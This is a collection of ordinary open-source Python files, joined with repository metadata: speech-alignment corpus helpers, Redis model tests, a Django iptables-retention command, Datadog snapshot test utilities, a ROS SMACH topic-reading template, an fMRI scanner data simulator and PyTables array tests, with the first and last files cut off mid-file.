extension: str
Extension of the path, like .scp or .ark
Returns
-------
dict[str, str]
Path for each dictionary
"""
output = {}
for dict_id in self.dictionary_ids:
if dict_id is None:
output[dict_id] = os.path.join(directory, f"{identifier}.{self.name}.{extension}")
else:
output[dict_id] = os.path.join(
directory, f"{identifier}.{dict_id}.{self.name}.{extension}"
)
return output
def construct_path(self, directory: str, identifier: str, extension: str) -> str:
"""
Helper function for constructing dictionary-dependent paths for the Job
Parameters
----------
directory: str
Directory to use as the root
identifier: str
Identifier for the path name, like ali or acc
extension: str
Extension of the path, like .scp or .ark
Returns
-------
str
Path
"""
return os.path.join(directory, f"{identifier}.{self.name}.{extension}")
def construct_dictionary_dependent_paths(
self, directory: str, identifier: str, extension: str
) -> Dict[str, str]:
"""
Helper function for constructing paths that depend only on the dictionaries of the job, and not the job name itself.
These paths should be merged with all other jobs to get a full set of dictionary paths.
Parameters
----------
directory: str
Directory to use as the root
identifier: str
Identifier for the path name, like ali or acc
extension: str
Extension of the path, like .scp or .ark
Returns
-------
dict[str, str]
Path for each dictionary
"""
output = {}
for dict_id in self.dictionary_ids:
output[dict_id] = os.path.join(directory, f"{identifier}.{dict_id}.{extension}")
return output
@property
def dictionary_count(self) -> int:
"""Number of dictionaries currently used"""
return len(self.dictionary_ids)
def output_for_features(self, split_directory: str, session) -> None:
"""
Output the necessary files for Kaldi to generate features
Parameters
----------
split_directory: str
Split directory for the corpus
"""
wav_scp_path = self.construct_path(split_directory, "wav", "scp")
segments_scp_path = self.construct_path(split_directory, "segments", "scp")
if os.path.exists(segments_scp_path):
return
with mfa_open(wav_scp_path, "w") as wav_file:
files = (
session.query(File.id, SoundFile.sox_string, SoundFile.sound_file_path)
.join(File.speakers)
.join(SpeakerOrdering.speaker)
.join(File.sound_file)
.distinct()
.filter(Speaker.job_id == self.name)
.order_by(File.id.cast(sqlalchemy.String))
)
for f_id, sox_string, sound_file_path in files:
if not sox_string:
sox_string = sound_file_path
wav_file.write(f"{f_id} {sox_string}\n")
with mfa_open(segments_scp_path, "w") as segments_file:
utterances = (
session.query(
Utterance.kaldi_id,
Utterance.file_id,
Utterance.begin,
Utterance.end,
Utterance.channel,
)
.join(Utterance.speaker)
.filter(Speaker.job_id == self.name)
.order_by(Utterance.kaldi_id)
)
for u_id, f_id, begin, end, channel in utterances:
segments_file.write(f"{u_id} {f_id} {begin} {end} {channel}\n")
def output_to_directory(self, split_directory: str, session, subset=False) -> None:
"""
Output job information to a directory
Parameters
----------
split_directory: str
Directory to output to
"""
if self.dictionary_ids:
for dict_id in self.dictionary_ids:
dict_pattern = f"{self.name}"
if dict_id is not None:
dict_pattern = f"{dict_id}.{self.name}"
scp_path = os.path.join(split_directory, f"utt2spk.{dict_pattern}.scp")
if not os.path.exists(scp_path):
break
else:
return
data = {}
utterances = (
session.query(
Utterance.id,
Utterance.speaker_id,
Utterance.features,
Utterance.normalized_text,
Utterance.normalized_text_int,
Speaker.cmvn,
Speaker.dictionary_id,
)
.join(Utterance.speaker)
.filter(Speaker.job_id == self.name)
.filter(Utterance.ignored == False) # noqa
.order_by(Utterance.kaldi_id)
)
if subset:
utterances = utterances.filter(Utterance.in_subset == True) # noqa
if utterances.count() == 0:
return
for (
u_id,
s_id,
features,
normalized_text,
normalized_text_int,
cmvn,
dictionary_id,
) in utterances:
if dictionary_id not in data:
data[dictionary_id] = {
"spk2utt": {},
"feats": {},
"cmvns": {},
"utt2spk": {},
"text_ints": {},
"texts": {},
}
utterance = str(u_id)
speaker = str(s_id)
utterance = f"{speaker}-{utterance}"
if speaker not in data[dictionary_id]["spk2utt"]:
data[dictionary_id]["spk2utt"][speaker] = []
data[dictionary_id]["spk2utt"][speaker].append(utterance)
data[dictionary_id]["utt2spk"][utterance] = speaker
data[dictionary_id]["feats"][utterance] = features
data[dictionary_id]["cmvns"][speaker] = cmvn
data[dictionary_id]["text_ints"][utterance] = normalized_text_int
data[dictionary_id]["texts"][utterance] = normalized_text
for dict_id, d in data.items():
dict_pattern = f"{self.name}"
if dict_id is not None:
dict_pattern = f"{dict_id}.{self.name}"
scp_path = os.path.join(split_directory, f"spk2utt.{dict_pattern}.scp")
with mfa_open(scp_path, "w") as f:
for speaker in sorted(d["spk2utt"].keys()):
utts = " ".join(sorted(d["spk2utt"][speaker]))
f.write(f"{speaker} {utts}\n")
scp_path = os.path.join(split_directory, f"cmvn.{dict_pattern}.scp")
with mfa_open(scp_path, "w") as f:
for speaker in sorted(d["cmvns"].keys()):
f.write(f"{speaker} {d['cmvns'][speaker]}\n")
scp_path = os.path.join(split_directory, f"utt2spk.{dict_pattern}.scp")
with mfa_open(scp_path, "w") as f:
for utt in sorted(d["utt2spk"].keys()):
f.write(f"{utt} {d['utt2spk'][utt]}\n")
scp_path = os.path.join(split_directory, f"feats.{dict_pattern}.scp")
with mfa_open(scp_path, "w") as f:
for utt in sorted(d["feats"].keys()):
f.write(f"{utt} {d['feats'][utt]}\n")
scp_path = os.path.join(split_directory, f"text.{dict_pattern}.int.scp")
with mfa_open(scp_path, "w") as f:
for utt in sorted(d["text_ints"].keys()):
f.write(f"{utt} {d['text_ints'][utt]}\n")
scp_path = os.path.join(split_directory, f"text.{dict_pattern}.scp")
with mfa_open(scp_path, "w") as f:
for utt in sorted(d["texts"].keys()):
f.write(f"{utt} {d['texts'][utt]}\n")
| {
"content_hash": "9bb2e3749c0b0cef54f689f02006dde2",
"timestamp": "",
"source": "github",
"line_count": 468,
"max_line_length": 124,
"avg_line_length": 36.94444444444444,
"alnum_prop": 0.5499132446500867,
"repo_name": "MontrealCorpusTools/Montreal-Forced-Aligner",
"id": "c878121d7af0dd6b5268bd7e6c90f1fe7fa2ff4f",
"size": "17290",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "montreal_forced_aligner/corpus/multiprocessing.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "95"
},
{
"name": "F*",
"bytes": "414"
},
{
"name": "Python",
"bytes": "1430732"
}
],
"symlink_target": ""
} |
import json
from redact.model import dump
from redact.model import load
from redact.model import save
from redact.db import get_redis_conn
from fixtures import model
from fixtures import saved_model
from fixtures import TestModel
from fixtures import TestMigratedModel
from fixtures import TestRemoteModel
### Tests
def test_model_load(saved_model):
assert len(get_redis_conn().keys(saved_model.key)) == 1
loaded_model = TestModel('test_model_1')
load(loaded_model)
assert loaded_model.test_str_1 == saved_model.test_str_1
assert loaded_model.test_str_2 == saved_model.test_str_2
assert loaded_model.test_str_3 == saved_model.test_str_3
def test_model_save(model):
assert len(get_redis_conn().keys(model.key)) == 0
save(model)
assert len(get_redis_conn().keys(model.key)) == 1
db_model = get_redis_conn().hgetall(model.key)
assert db_model is not None
assert model.test_str_1 == json.loads(db_model['t1'])
assert model.test_str_2 == json.loads(db_model['t2'])
assert model.test_str_3 == json.loads(db_model['t3'])
def test_model_dump(model):
json_model = dump(model)
reloaded_json = json.loads(json_model)
assert model.test_str_1 == reloaded_json['test_str_1']
assert model.test_str_2 == reloaded_json['test_str_2']
assert model.test_str_3 == reloaded_json['test_str_3']
def test_model_migration(saved_model):
assert saved_model.version == 0
loaded_model = TestMigratedModel('test_model_1')
load(loaded_model)
assert loaded_model.test_str_1 == saved_model.test_str_1
assert loaded_model.test_str_2 == saved_model.test_str_2
assert loaded_model.test_str_3 == saved_model.test_str_3
assert loaded_model.test_extra_value_1 == "TEST_MIGRATION_VALUE_1"
assert loaded_model.test_extra_value_2 == "TEST_MIGRATION_VALUE_2"
assert loaded_model.version == 2
# Verify migration doesn't happen next time
loaded_model.test_extra_value_1 = 'different value 1'
loaded_model.test_extra_value_2 = 'different value 2'
save(loaded_model)
new_loaded_model = TestMigratedModel('test_model_1')
load(new_loaded_model)
assert new_loaded_model.test_extra_value_1 != "TEST_MIGRATION_VALUE_1"
assert new_loaded_model.test_extra_value_2 != "TEST_MIGRATION_VALUE_2"
assert new_loaded_model.test_extra_value_1 == loaded_model.test_extra_value_1
assert new_loaded_model.test_extra_value_2 == loaded_model.test_extra_value_2
assert new_loaded_model.version == 2
def test_model_remote_key_value(saved_model):
loaded_model = TestModel('test_model_1')
load(loaded_model)
loaded_remote_model = TestRemoteModel(loaded_model.test_remote_key_value)
load(loaded_remote_model)
assert loaded_remote_model.test_str_1 == 'd'
| {
"content_hash": "10f23531fab07ca6e9ee1521dbafad8f",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 81,
"avg_line_length": 37.945205479452056,
"alnum_prop": 0.7090252707581227,
"repo_name": "df3n5/redact-py",
"id": "c1c0ee35d7d48659b44d7686f7996eb3f2353742",
"size": "2770",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31693"
}
],
"symlink_target": ""
} |
from django.core.management.base import BaseCommand
from app.models import Forwarding
import datetime
class Command(BaseCommand):
help = "Trigger IPtables retention."
def add_arguments(self, parser):
parser.add_argument('tunnel', nargs='*', type=int)
parser.add_argument('--time', default=(60 * 60 * 24), type=int)
def handle(self, *args, **kwargs):
query = {}
query['updated_at__lt'] = (
datetime.datetime.utcnow() -
datetime.timedelta(seconds=kwargs['time'])
)
if kwargs['tunnel']:
query['tunnel_id__in'] = kwargs['tunnel']
for frule in Forwarding.objects.filter(**query):
self.stdout.write("Disabling %s..." % frule)
frule.disable()
| {
"content_hash": "6b77a53ffd620273386290a26124de3a",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 71,
"avg_line_length": 32.041666666666664,
"alnum_prop": 0.599479843953186,
"repo_name": "dimrozakis/vpn-proxy",
"id": "323016df9d1a6b648193cc01e1677db8c5a8afc2",
"size": "769",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vpn-proxy/app/management/commands/retain_iptables.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "45228"
},
{
"name": "Shell",
"bytes": "10401"
}
],
"symlink_target": ""
} |
import io
from PIL import Image
import nose.tools as nt
from datadog.util.compat import url_lib
# For Python3 compat
try:
xrange
except NameError:
xrange = range
def read_image_as_raster(img_url):
""" Reads image data from URL in raster format."""
img = url_lib.urlopen(img_url)
image_file = io.BytesIO(img.read())
img = Image.open(image_file)
w, h = img.size
pixels = img.load()
return [pixels[x, y] for x in range(w) for y in xrange(h)]
def assert_snap_not_blank(snapshot_url):
""" Asserts snapshot is not blank"""
pixels = read_image_as_raster(snapshot_url)
nt.ok_(pixels is not None
and isinstance(pixels, list)
and len(set(pixels)) > 2,
msg="Invalid or blank snapshot: {0}".format(snapshot_url))
for pixel in set(pixels):
nt.ok_(isinstance(pixel, tuple),
msg="Invalid snapshot: {0}".format(snapshot_url))
def assert_snap_has_no_events(snapshot_url):
""" Asserts snapshot has no events"""
pixels = read_image_as_raster(snapshot_url)
for color in set(pixels):
r, g, b, a = color # red, green, blue, alpha
nt.ok_(r != 255 or g != 230 and b != 230,
msg="Snapshot should not have events: {0}".format(snapshot_url))
| {
"content_hash": "5330b2ed79a803272d4c2df9b1305175",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 79,
"avg_line_length": 29.674418604651162,
"alnum_prop": 0.6261755485893417,
"repo_name": "jofusa/datadogpy",
"id": "33cc20d92aab4c1e37f12b4d970adf33b04bc34c",
"size": "1276",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tests/util/snapshot_test_utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "259510"
},
{
"name": "Ruby",
"bytes": "333"
}
],
"symlink_target": ""
} |
from typing import Optional
from antlr4.Token import CommonToken
from cleo.styles import OutputStyle
class SDocVisitor:
"""
Parent visitor for SDoc level 1 & 2.
"""
# ------------------------------------------------------------------------------------------------------------------
def __init__(self, io: OutputStyle):
"""
Object constructor.
"""
self._io: OutputStyle = io
"""
Styled output formatter.
"""
self._errors: int = 0
"""
The error count.
"""
# ------------------------------------------------------------------------------------------------------------------
@property
def errors(self) -> int:
"""
Getter for the error count.
"""
return self._errors
# ------------------------------------------------------------------------------------------------------------------
def _error(self, message: str, token: Optional[CommonToken] = None) -> None:
"""
Logs an error.
:param str message: The error message.This message will be appended with 'at filename:line.column' ot the token.
:param antlr4.Token.CommonToken token: The token where the error occurred.
"""
self._errors += 1
filename = token.getInputStream().fileName # Replace fileName with get_source_name() when implemented in ANTLR.
line_number = token.line
column_number = token.column + 1
messages = [message]
if token:
messages.append('Position: {0!s}:{1:d}.{2:d}'.format(filename, line_number, column_number))
self._io.error(messages)
# ----------------------------------------------------------------------------------------------------------------------
| {
"content_hash": "98555aeaedeeded412f04e869eadf6bd",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 120,
"avg_line_length": 33.407407407407405,
"alnum_prop": 0.4229490022172949,
"repo_name": "SDoc/py-sdoc",
"id": "065cd3b233165573fb67c3575abbecee79e6781b",
"size": "1925",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sdoc/sdoc/SDocVisitor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ANTLR",
"bytes": "7968"
},
{
"name": "Python",
"bytes": "406820"
}
],
"symlink_target": ""
} |
""" Simulate the output from Pyneal Scanner
During a real-time scan, Pyneal Scanner will send data to pyneal over a socket
connection. Each transmission comes in 2 phases: first a json header with
metadata about the volume, then the volume itself. This tool will emulate that
same behavior
You can either supply real 4D image data (as .nii/.nii.gz), or use this tool
to generate a fake dataset of random values.
Set the scan parameters below to indicate the dimensions of your
simulated data (i.e. slice dimensions, number of slices per volume,
number of timepts)
"""
# python 2/3 compatibility
from __future__ import print_function
from __future__ import division
from builtins import input
import time
import json
import argparse
import zmq
import numpy as np
import nibabel as nib
def prepRealDataset(image_path):
""" Prepare a real, existing dataset for use with the simulator
Read in the supplied 4d image file, set orientation to RAS+
Parameters
----------
image_path : string
full path to the dataset you want to use
Returns
-------
ds_RAS : nibabel-like image
Nibabel dataset with orientation set to RAS+
"""
print('Prepping dataset: {}'.format(image_path))
ds = nib.load(image_path)
# make sure it's RAS+
ds_RAS = nib.as_closest_canonical(ds)
print('Dimensions: {}'.format(ds_RAS.shape))
return ds_RAS
def prepRandomDataset(dims):
""" Prepare a randomized dataset for use with the simulator
Build a random dataset of shape dims. Build RAS+ affine (just identiy
matrix in this case)
Parameters
----------
dims : list (4 items)
dimensions of the simulated dataset [x, y, z, t]
Returns
-------
ds : nibabel-like image
Nibabel dataset
"""
print('Prepping randomized dataset')
fakeDataset = np.random.randint(low=1000,
high=3000,
size=(dims[0],
dims[1],
dims[2],
dims[3]),
dtype='uint16')
affine = np.eye(4)
ds = nib.Nifti1Image(fakeDataset, affine)
print('Randomized Dataset')
print('Dimensions: {}'.format(ds.shape))
return ds
def pynealScannerSimulator(dataset, TR=1000, host='127.0.0.1', port=5555):
""" Pyneal Scanner Simulator
Simulate Pyneal Scanner by sending the supplied dataset to Pyneal via
socket one volume at a time. Rate set by 'TR' argument. Each volume
preceded with a json header with metadata about volume, just like during a
real scan
Paramters
---------
dataset : nibabel-like image
Nibabel like image representing the dataset you'd like to use for the
simulation
TR : int, optional
TR to send the data at. In ms (default: 1000)
host : string, optional
Host IP address of Pyneal server. Pyneal Scanner will send data to this
address (default: '127.0.0.1')
port : int
Port number to use for sending data to Pyneal
"""
print('TR: {}'.format(TR))
# convert TR to sec (the unit of time.sleep())
TR = TR / 1000
# Create socket, bind to address
print('Connecting to Pyneal at {}:{}'.format(host, port))
context = zmq.Context.instance()
socket = context.socket(zmq.PAIR)
socket.connect('tcp://{}:{}'.format(host, port))
ds_array = dataset.get_fdata()
ds_affine = dataset.affine
# Wait for pyneal to connect to the socket
print('waiting for connection...')
while True:
msg = 'hello from pynealScanner_sim'
socket.send_string(msg)
resp = socket.recv_string()
if resp == msg:
print('connected to pyneal')
break
# Press Enter to start sending data
input('Press ENTER to begin the "scan" ')
# sleep for 1TR to account for first volume being collected
time.sleep(TR)
# Start sending data!
for volIdx in range(ds_array.shape[3]):
startTime = time.time()
# grab this volume from the dataset
thisVol = np.ascontiguousarray(ds_array[:, :, :, volIdx])
# build header
volHeader = {'volIdx': volIdx,
'dtype': str(thisVol.dtype),
'shape': thisVol.shape,
'affine': json.dumps(ds_affine.tolist()),
'TR': str(TR*1000)}
# send header as json
socket.send_json(volHeader, zmq.SNDMORE)
# now send the voxel array for this volume
socket.send(thisVol, flags=0, copy=False, track=False)
print('Sent vol: {}'.format(volIdx))
# list for response
socketResponse = socket.recv_string()
print('Socket Response: {}'.format(socketResponse))
if TR > 0:
elapsedTime = time.time() - startTime
time.sleep(TR - elapsedTime)
# close the socket
context.destroy()
# run from command line
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser(description="Pyneal-Scanner Simulator",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-f', '--filePath',
nargs=1,
help='path to 4D nifti file')
parser.add_argument('-r', '--random',
action='store_true',
help='flag to generate random data')
parser.add_argument('-d', '--dims',
nargs=4,
default=[64, 64, 18, 60],
type=int,
help='dimensions of randomly generated dataset: x y z t')
parser.add_argument('-t', '--TR',
default=1000,
type=int,
help='TR (in ms)')
parser.add_argument('-sh', '--sockethost',
default='127.0.0.1',
help='Pyneal socket host')
parser.add_argument('-sp', '--socketport',
default=5555,
help='Pyneal socket port')
args = parser.parse_args()
# Prep data, real or fake
if args.filePath:
dataset = prepRealDataset(args.filePath[0])
else:
dataset = prepRandomDataset(args.dims)
# run pynealScanner Simulator
pynealScannerSimulator(dataset,
TR=args.TR,
host=args.sockethost,
port=args.socketport)
| {
"content_hash": "fe6f8f9911946fb3a60391bf52734059",
"timestamp": "",
"source": "github",
"line_count": 212,
"max_line_length": 92,
"avg_line_length": 31.27358490566038,
"alnum_prop": 0.5779788838612367,
"repo_name": "jeffmacinnes/pyneal",
"id": "85b09441b8cc7c777057d8b7e6b727691fa37d47",
"size": "6630",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utils/simulation/pynealScanner_sim.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "7821"
},
{
"name": "HTML",
"bytes": "2219"
},
{
"name": "JavaScript",
"bytes": "23040"
},
{
"name": "MATLAB",
"bytes": "286017"
},
{
"name": "Python",
"bytes": "423023"
},
{
"name": "Shell",
"bytes": "1522"
}
],
"symlink_target": ""
} |
"""
Lonely Planet Models
"""
from __future__ import absolute_import
| {
"content_hash": "1a2e931e3a1aeac2b594215b6467ea69",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 38,
"avg_line_length": 17,
"alnum_prop": 0.7058823529411765,
"repo_name": "jricardo27/travelhelper",
"id": "a73e55be645c8b5009c8ff58104f87daf5b3ccba",
"size": "68",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "travelhelper/apps/lonelyplanet/models/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "161"
},
{
"name": "HTML",
"bytes": "28104"
},
{
"name": "Python",
"bytes": "175574"
},
{
"name": "Shell",
"bytes": "633"
}
],
"symlink_target": ""
} |
{% block meta %}
name: ReadTopicState
description:
SMACH state that reads data from a ROS topic.
language: Python
framework: SMACH
type: State
tags: [core]
includes: []
extends:
- WaitForMsgState
variables:
- input_keys:
description:
Other than the 'topic' input_key, which specifies the topic to be read,
remaining input_keys are assumed to be used by the optionally specified
callback functions.
type: list of str
- - output_keys:
description:
If any of the output_keys ['output', 'msg', 'output_msg', 'msg_output']
are specified, the read topic data will be written to them.
Any remaining output_keys are assumed to be used for each optionally
specified and correspondingly named callback function.
type: list of str
- - callbacks:
description:
Either callback function names or backtick-wrapped lambda functions
for possible modifications to the topic reading procedure.
type: dict of str
input_keys:
- topic:
description:
The name of the topic from which the data should be read.
type: str
output_keys:
- - output:
description:
The default output key for the topic data.
type: str
- msg:
description:
A possible output key for the topic data.
type: str
- output_msg:
description:
A possible output key for the topic data.
type: str
- msg_output:
description:
A possible output key for the topic data.
type: str
outcomes:
- succeeded
- aborted
{% endblock meta %}
{% extends "WaitForMsgState.tpl.py" %}
{% from "Utils.tpl.py" import import_module, render_init_callbacks, render_execute_callbacks %}
{% block imports %}
{{ super() }}
{{ import_module(defined_headers, 'rostopic') }}
{{ import_module(defined_headers, 'rospy') }}
{{ import_module(defined_headers, 'roslib') }}
{% endblock imports %}
{% block class_defs %}
{{ super() }}
{% if 'class_ReadTopicState' not in defined_headers %}
class ReadTopicState(smach.State):
def __init__(self, input_keys=['topic'], output_keys=['output'], callbacks = None):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded', 'aborted'])
{{ render_init_callbacks() }}
def execute(self, userdata):
{{ render_execute_callbacks() }}
# Get topic name from userdata
try:
topic = userdata.topic
except Exception as e:
rospy.logerr('Topic name must be specified as a userdata input key: {}'.format(repr(e)))
return 'aborted'
# Default to rospy.AnyMsg, whereby the message type will be dynamically detected.
msg_class = rospy.AnyMsg
# If the message type is specified in userdata, use it instead of rospy.AnyMsg
if 'msg_type' in self._input_keys:
try:
msg_class = roslib.message.get_message_class(userdata.msg_type)
except Exception as e:
rospy.logwarn('Failed to load message class from message type specified in userdata, proceeding with message type/class detection.')
msg_class = rospy.AnyMsg
pass
# Try detecting the message type/class if necessary.
# See: https://schulz-m.github.io/2016/07/18/rospy-subscribe-to-any-msg-type/
if msg_class is rospy.AnyMsg:
try:
with WaitForMsgState(topic, msg_class, latch=True) as wait_for_any_msg:
any_msg = wait_for_any_msg.waitForMsg()
msg_type = any_msg._connection_header['type']
rospy.loginfo('Message type for topic {} detected as {}'.format(topic, msg_type))
msg_class = roslib.message.get_message_class(msg_type)
except Exception as e:
rospy.logerr('Failed to detect message type/class for topic {}: {}'.format(topic, repr(e)))
return 'aborted'
# Set up a WaitForMsgState object
try:
wait_for_msg = WaitForMsgState(topic, msg_class, latch=True)
except Exception as e:
rospy.logerr('Failed to set up WaitForMsgState object for topic {}: {}'.format(topic, repr(e)))
return 'aborted'
# Wait for message
try:
msg = wait_for_msg.waitForMsg()
except Exception as e:
rospy.logwarn('Failed to read message from topic {}: {}'.format(topic, repr(e)))
return 'aborted'
# Set msg output key if specified
for output_key in ['msg', 'output', 'output_msg', 'msg_output']:
if output_key in self._output_keys:
setattr(userdata, output_key, msg)
return 'succeeded'
{% do defined_headers.append('class_ReadTopicState') %}{% endif %}
{% endblock class_defs %}
| {
"content_hash": "82edde205aa0f7abad0d5d2decf62081",
"timestamp": "",
"source": "github",
"line_count": 135,
"max_line_length": 148,
"avg_line_length": 35.8962962962963,
"alnum_prop": 0.6246388774246802,
"repo_name": "ReconCell/smacha",
"id": "ab33d1124c91c1d8c6cca637161e169d203359e8",
"size": "4846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "smacha_ros/src/smacha_ros/templates/ReadTopicState.tpl.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1574"
},
{
"name": "CMake",
"bytes": "10500"
},
{
"name": "Makefile",
"bytes": "1336"
},
{
"name": "Python",
"bytes": "1277803"
},
{
"name": "Shell",
"bytes": "15158"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import os
import sys
import tempfile
import numpy as np
import tables
from tables import (
StringCol, BoolCol, FloatCol, ComplexCol, EnumCol,
Int8Col, UInt8Col, Int16Col, UInt16Col, Int32Col, UInt32Col,
Int64Col, Float32Col, Float64Col, Time64Col
)
from tables.tests import common
from tables.tests.common import allequal
from tables.tests.common import unittest
from tables.tests.common import PyTablesTestCase as TestCase
typecodes = ['b', 'h', 'i', 'l', 'q', 'f', 'd']
# UInt64 checking disabled on win platforms
# because this type is not supported
if sys.platform != 'win32':
typecodes += ['B', 'H', 'I', 'L', 'Q', 'F', 'D']
else:
typecodes += ['B', 'H', 'I', 'L', 'F', 'D']
typecodes += ['b1'] # boolean
if hasattr(tables, 'Float16Atom'):
typecodes.append('e')
if hasattr(tables, 'Float96Atom') or hasattr(tables, 'Float128Atom'):
typecodes.append('g')
if hasattr(tables, 'Complex192Atom') or hasattr(tables, 'Conplex256Atom'):
typecodes.append('G')
byteorder = {'little': '<', 'big': '>'}[sys.byteorder]
class BasicTestCase(TestCase):
"""Basic test for all the supported typecodes present in NumPy.
All of them are included on PyTables.
"""
endiancheck = 0
def WriteRead(self, testArray):
if common.verbose:
print('\n', '-=' * 30)
print("Running test for array with typecode '%s'" %
testArray.dtype.char, end=' ')
print("for class check:", self.title)
# Create an instance of HDF5 Table
self.h5fname = tempfile.mktemp(".h5")
try:
with tables.open_file(self.h5fname, mode="w") as self.h5file:
self.root = self.h5file.root
# Create the array under root and name 'somearray'
a = testArray
self.h5file.create_array(self.root, 'somearray', a,
"Some array")
# Re-open the file in read-only mode
with tables.open_file(self.h5fname, mode="r") as self.h5file:
self.root = self.h5file.root
# Read the saved array
b = self.root.somearray.read()
# For cases that read returns a python type instead of a
# numpy type
if not hasattr(b, "shape"):
b = np.np.array(b, dtype=a.dtype.str)
# Compare them. They should be equal.
# if not allequal(a,b, "numpy") and common.verbose:
if common.verbose:
print("Array written:", a)
print("Array written shape:", a.shape)
print("Array written itemsize:", a.itemsize)
print("Array written type:", a.dtype.char)
print("Array read:", b)
print("Array read shape:", b.shape)
print("Array read itemsize:", b.itemsize)
print("Array read type:", b.dtype.char)
type_ = self.root.somearray.atom.type
# Check strictly the array equality
self.assertEqual(type(a), type(b))
self.assertEqual(a.shape, b.shape)
self.assertEqual(a.shape, self.root.somearray.shape)
self.assertEqual(a.dtype, b.dtype)
if a.dtype.char[0] == "S":
self.assertEqual(type_, "string")
else:
self.assertEqual(a.dtype.base.name, type_)
self.assertTrue(allequal(a, b, "numpy"))
finally:
# Then, delete the file
if os.path.exists(self.h5fname):
os.remove(self.h5fname)
def test00_char(self):
"""Data integrity during recovery (character objects)"""
a = np.array(self.tupleChar, 'S'+str(len(self.tupleChar)))
self.WriteRead(a)
def test01_char_nc(self):
"""Data integrity during recovery (non-contiguous character objects)"""
a = np.array(self.tupleChar, 'S'+str(len(self.tupleChar)))
if a.shape == ():
b = a # We cannot use the indexing notation
else:
b = a[::2]
# Ensure that this numpy string is non-contiguous
if a.shape[0] > 2:
self.assertEqual(b.flags['CONTIGUOUS'], False)
self.WriteRead(b)
def test02_types(self):
"""Data integrity during recovery (numerical types)"""
for typecode in typecodes:
if self.tupleInt.shape:
a = self.tupleInt.astype(typecode)
else:
# shape is the empty tuple ()
a = np.array(self.tupleInt, dtype=typecode)
self.WriteRead(a)
def test03_types_nc(self):
"""Data integrity during recovery (non-contiguous numerical types)"""
for typecode in typecodes:
if self.tupleInt.shape:
a = self.tupleInt.astype(typecode)
else:
# shape is the empty tuple ()
a = np.array(self.tupleInt, dtype=typecode)
# This should not be tested for the rank-0 case
if len(a.shape) == 0:
raise unittest.SkipTest
b = a[::2]
# Ensure that this array is non-contiguous (for non-trivial case)
if a.shape[0] > 2:
self.assertEqual(b.flags['CONTIGUOUS'], False)
self.WriteRead(b)
class Basic0DOneTestCase(BasicTestCase):
# Rank-0 case
title = "Rank-0 case 1"
tupleInt = np.array(3)
tupleChar = "4"
class Basic0DTwoTestCase(BasicTestCase):
# Rank-0 case
title = "Rank-0 case 2"
tupleInt = np.array(33)
tupleChar = "44"
class Basic1DOneTestCase(BasicTestCase):
# 1D case
title = "Rank-1 case 1"
tupleInt = np.array((3,))
tupleChar = ("a",)
class Basic1DTwoTestCase(BasicTestCase):
# 1D case
title = "Rank-1 case 2"
tupleInt = np.array((0, 4))
tupleChar = ("aaa",)
class Basic1DThreeTestCase(BasicTestCase):
# 1D case
title = "Rank-1 case 3"
tupleInt = np.array((3, 4, 5))
tupleChar = ("aaaa", "bbb",)
class Basic2DTestCase(BasicTestCase):
# 2D case
title = "Rank-2 case 1"
# tupleInt = reshape(np.array(np.arange((4)**2)), (4,)*2)
tupleInt = np.ones((4,)*2)
tupleChar = [["aaa", "ddddd"], ["d", "ss"], ["s", "tt"]]
class Basic10DTestCase(BasicTestCase):
# 10D case
title = "Rank-10 case 1"
# tupleInt = reshape(np.array(np.arange((2)**10)), (2,)*10)
tupleInt = np.ones((2,)*10)
# tupleChar = reshape(np.array([1],dtype="S1"),(1,)*10)
# The next tuple consumes far more time, so this
# test should be run in common.heavy mode.
tupleChar = np.array(tupleInt, dtype="S1")
# class Basic32DTestCase(BasicTestCase):
# # 32D case (maximum)
# tupleInt = reshape(np.array((22,)), (1,)*32)
# # Strings seems to be very slow with somewhat large dimensions
# # This should not be run unless the numarray people address this problem
# # F. Alted 2006-01-04
# tupleChar = np.array(tupleInt, dtype="S1")
class GroupsArrayTestCase(common.TempFileMixin, TestCase):
"""This test class checks combinations of arrays with groups.
It also uses arrays ranks which ranges until 10.
"""
def test00_iterativeGroups(self):
"""Checking combinations of arrays with groups
It also uses arrays ranks which ranges until 10.
"""
if common.verbose:
print('\n', '-=' * 30)
print("Running %s.test00_iterativeGroups..." %
self.__class__.__name__)
# Get the root group
group = self.h5file.root
i = 1
for typecode in typecodes:
# Create an array of typecode, with incrementally bigger ranges
a = np.ones((2,) * i, typecode)
# Save it on the HDF5 file
dsetname = 'array_' + typecode
if common.verbose:
print("Creating dataset:", group._g_join(dsetname))
self.h5file.create_array(group, dsetname, a, "Large array")
# Create a new group
group = self.h5file.create_group(group, 'group' + str(i))
# increment the range for next iteration
i += 1
self._reopen()
# Get the root group
group = self.h5file.root
# Get the metadata on the previosly saved arrays
for i in range(1, len(typecodes)):
# Create an array for later comparison
a = np.ones((2,) * i, typecodes[i - 1])
# Get the dset object hanging from group
dset = getattr(group, 'array_' + typecodes[i-1])
# Get the actual array
